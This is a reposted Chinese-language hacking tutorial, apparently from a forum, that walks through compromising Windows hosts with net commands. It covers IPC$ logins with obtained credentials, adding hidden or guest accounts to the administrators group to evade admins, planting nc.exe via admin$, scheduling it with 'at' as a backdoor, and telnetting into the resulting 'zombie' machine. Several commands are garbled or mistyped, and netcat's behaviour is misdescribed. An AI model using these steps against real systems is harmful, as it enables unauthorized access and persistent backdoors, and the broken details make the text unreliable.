hei你懂的（转）

网络中最常用的命令:net 只要你拥有某ip的用户名和密码，就可以进行ipc$空连接！ 
这里我们假如你得到的用户是fish，密码是123456。假设对方ip为127.0.0.1 
net use 127.0.0.1ipc$ "123456" /user:"fish" 
切断空连接的命令是 
net use 127.0.0.1ipc$ /delte 
这样你便等于登录上了此ip的电脑,但至此你还没有获得任何权限 
下面讲述如何创建一个自己的帐户 
net user honkstudent 123 /add 
如果命令显示成功,则说明添加用户成功,下一步要做的便是将此用户提升为管理员 
net localgroup administrator honkstudent /add 
如果命令显示成功,说明己经升级此用户的权限为管理员. 
如果怕让管理员发现而不想自己创建帐户,便可以将默认的guest帐户提升为管理员 
net user guest /active:yes 
如果命令成功,则激活windows下guest帐户成功, 
下一步便为guest帐户添加密码 
net user guest 123 
命令成功后你便拥有了系统游客的权限,但这些远远不够,猜到后面该怎么做了吧?^_^ 
net localgroup administrator guest /add 
命令成功后你这个游客便拥有了和管理员一样的操作等级了 2:远程运行命令:at 如果您己经进入某台主机后,想为将来"名正言顺"的再次进入该主机作打算,该怎么办呢?不用说,当然得做个后门,这就少不了远程运行命令:at 
首先你要将你最得意的木马植入那台服务器, 
copy c:nc.exe 127.0.0.1admin$ 
(介绍一下nc.nc为netcat简称,是网上最有名的木马程序之一,运行后打开系统telnet服务,默认端口为99) 
然后所要做的事便是要让这个后门在服务器上运行: 
首先获得服务器上时间:net time 127.0.0.1 
假设返回的对方系统时间为11:58 
获得时间后你便可以对系统加入一个作业id,id=1(必须要系统启动了schedule服务) 
at 127.0.0.1 12:00 nc.exe 
如果命令成功便会返回一个id号,你便可以在12:00以后远程登录上这台服务器了 3:远程登录:telnet 这个命令非常实用,它可以与远方做连接，不过正常下需要密码、用户,不过你给对方种 
了木马,直接连到这个木马打开的端口. 
telnet 127.0.0.1 99 
这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡. 
辟如： 
cmd>ping -t ping对方机器 (前提:对方没有进行tcp/ip数据包限制) 
cmd>netstat -a ipaddress (获取对方机器当前活动的相关进程) 
cmd>net view ip-address ( 通上,适用于win98) 
cmd>net use x:ipipc$ /user:username password (用相关账号和密码登陆对方机器) 
cmd>net send ip message 向指定ip发送message (前提是对方机器没有关message se 
nd 服务) 
cmd>net time ( 是对方机器时间于本机同步) 
cmd>at ipaddress time c:winntsystem32net.exe user account password /add (在对方机器中增添账号和密码) 
cmd>copy con *.bat @echo tsenable=on>> 
cmd>copy *.bat x: ( 复制文件到对方机器) 
ftp 
telnet